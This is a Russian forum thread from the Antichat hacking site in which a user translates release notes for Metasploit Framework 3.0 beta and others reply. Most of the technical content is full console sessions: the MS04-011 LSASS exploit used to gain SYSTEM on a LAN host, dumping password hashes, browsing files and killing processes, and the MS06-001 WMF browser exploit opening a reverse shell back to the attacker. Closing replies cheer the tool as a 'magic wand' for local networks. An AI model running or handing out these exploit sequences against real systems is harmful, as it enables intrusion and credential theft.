Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Метасплоит Framework v. 3.0 (описание) (https://forum.antichat.xyz/showthread.php?t=28128)

-=lebed=- 28.11.2006 14:08

Метасплоит Framework v. 3.0 (начнёмс, пожалуй, с перевода офиц. новостей)
 
Меtasploit Framework 3.0

Предисловие:
Прежде чем приступать к чтению статьи, для более глубокого понимания рекомендую ознакомиться с моими статьями по данному пакету
http://www.forum.antichat.ru/thread21599.html
http://www.forum.antichat.ru/thread21686.html
Статья ИМХО не расчитана на новичков, а предназначена для тех кто достаточно хорошо владеет навыками пользования пакетом и обладает определённым багажом знаний по вопросом эксплуатации уязвимостей...

1. Перевод с официального сайта новости, касающейся выхода пакета Metasploit Framework 3.0 Beta 1 (hdm) от 02.08.2006. оригинал новости
Цитата:

Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.

Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)

Этот выпуск может быть скачан с официального web-сайта Metasploit отсюда

Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org и собрать его из исходника.

Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)

Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).

Быстрая демонстрация использования msfconsole с meterpreter:

____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *


= [msf v3.0-beta-1
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
+ -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
= [4 aux

msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
[*] Started bind handler.. .................................... стартует связанный обработчик
[*] Getting OS information... .................................... Получаем информацию об операционной системе
[*] Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
[*] Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
[*] Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
[*] Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
[*] Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
[*] Upload completed. .................................................. . Загрузка завершена.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
[*] The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============

Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]

meterpreter > ps .................................................. ....... смотрим процессы

Process list
============

PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr

meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)

Обратная связь

Старые статьи были перемещены в архив.
(с) metasploit.com, альфа версия перевода -=lebed=- 28.11.2006

P.S. Перевод сыроват, буду править... буду рад видеть здесь поправики, подсказки от всех интересующихся и пользующихся пакетом v.3.0 проекта Metasploit Framework

-=lebed=- 29.11.2006 16:03

Цитата:

Meterpreter - расширенная многофункциональная начинка (полезный груз), которая может быть динамически расширена во время выполнения. В нормальных условиях, это означает, что это обеспечивает Вас основной оболочкой и позволяет Вам добавлять новые особенности к ней по мере необходимости. Пожалуйста обратитесь к Meterpreter документации для глубокого описания того, как это работает и что Вы можете сделать с этим. Meterpreter руководство может быть найдено в подкаталоге docs Framework.
О! Это уже интересней....

-=lebed=- 29.11.2006 18:47

Цитата:

msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Started reverse handler
[*] Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
[*] Server started.
[*] Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495)
msf exploit(ms06_001_wmf_setabortproc) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc
Ну и как теперь его переключить на передний план, где пайп с cmd? Мда... будем разбираться дальше, ИМХО изменения в версии 3 пакета огромны! (в сравнении с 2.7).

Gh0s7 29.11.2006 19:22

Цитата:

Сообщение от -=lebed=-
Ну и как теперь его переключить на передний план, где пайп с cmd? Мда... будем разбираться дальше, ИМХО изменения в версии 3 пакета огромны! (в сравнении с 2.7).


Самое интересное что офф доки по 3 части нету...Даже хелпа по jobs нет...

1ten0.0net1 30.11.2006 01:05

Цитата:

...нуждаются в установке openssl и zlib модулей Рубина (интерпретируемый язык программирования высокого уровня...
Это Ruby что ли? =)) Плакалъ.

-=lebed=- 30.11.2006 10:51

Цитата:

Сообщение от 1ten0.0net1
Это Ruby что ли? =)) Плакалъ.

Ну да, а что? Perl от слова pearl - жемчужина, а Ruby от слова Рубин, не я же названия языкам придумывал... Просто я первый раз такой услышал, а промт перевёл как Рубин. Как он по русски-то произносится? Так же как и пишется Ruby - Руби!? Как на сленге то? Я х. е. з, А? ИМХО всё таки Руби с ударением на "У" ну ладно поправить недолго...
Исправил...

-=lebed=- 30.11.2006 21:31

Цитата:

msf exploit(ms06_001_wmf_setabortproc) > cmd
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Program Files\Metasploit\Framework3\home>chcp
chcp
’ҐЄгй*п Є®¤®ў*п бва**Ёж*: 1251

C:\Program Files\Metasploit\Framework3\home>chcp 1251
chcp 1251
’ҐЄгй*п Є®¤®ў*п бва**Ёж*: 1251

C:\Program Files\Metasploit\Framework3\home>dir
dir
Том в устройстве C имеет метку ACER
Серийный номер тома: ХХХХ-ХХХХ

Содержимое папки C:\Program Files\Metasploit\Framework3\home

29.11.2006 23:06 <DIR> .
29.11.2006 23:06 <DIR> ..
17.02.2004 12:21 533 .bash_profile
28.08.2006 03:17 688 .bashrc
29.10.2006 22:53 499 .inputrc
30.07.2006 06:36 82 .irbrc
28.08.2006 02:38 12*501 LICENSE
28.10.2006 22:19 743 accept_license.rb
30.10.2006 07:20 23*009*280 framework.tar
29.10.2006 02:28 225 msfupdate
29.10.2006 02:20 551 run_msfconsole
29.10.2006 08:28 294 run_msfupdate
29.10.2006 22:48 362 run_msfweb
29.11.2006 23:06 <DIR> .subversion
29.11.2006 23:13 16 .LICENSED
30.10.2006 07:20 <DIR> framework
29.11.2006 23:14 <DIR> .msf3
12 файлов 23*025*774 байт
5 папок 11*026*890*752 байт свободно

C:\Program Files\Metasploit\Framework3\home>
Оказывается все просто, надо набрать cmd в консоли msf после успешного установления соединения и мы уже в шелле! Рулёз! Всё пашет, у меня даже на ноуте с предустановленной лицензионной виндой XP-HOME (система оказалась уязвима к WMF-багу) ломал сам себя, будем дальше ковырять бету 3 (ver. 3.0)
Кстати можно выйти из удалённого шелла, потом опять туда зайти, класс!

A110ut 30.11.2006 22:12

Цитата:

Сообщение от топикпастер
Perl от слова pearl - жемчужина

Perl от слова Pathologically Eclectic Rubbish Lister (с) :)

-=lebed=- 30.11.2006 22:40

Цитата:

Сообщение от A110ut
Perl от слова Pathologically Eclectic Rubbish Lister (с) :)

Ну да, практический язык извлечений и отчётов.
Да хрен с ними с легендами и определениями, не в них суть-то. А суть в том что третья бета 3-ей версия пакета очень даже ничего...

P.S. Руби (Ruby) тоже аббревиатура?, может тоже тогда расшифруешь, чтоб уж для полной ясности?

win32_reverse 24.01.2007 05:42

метасплоит рулит)) волшебноё падочко в локальной сети)))


Время: 12:04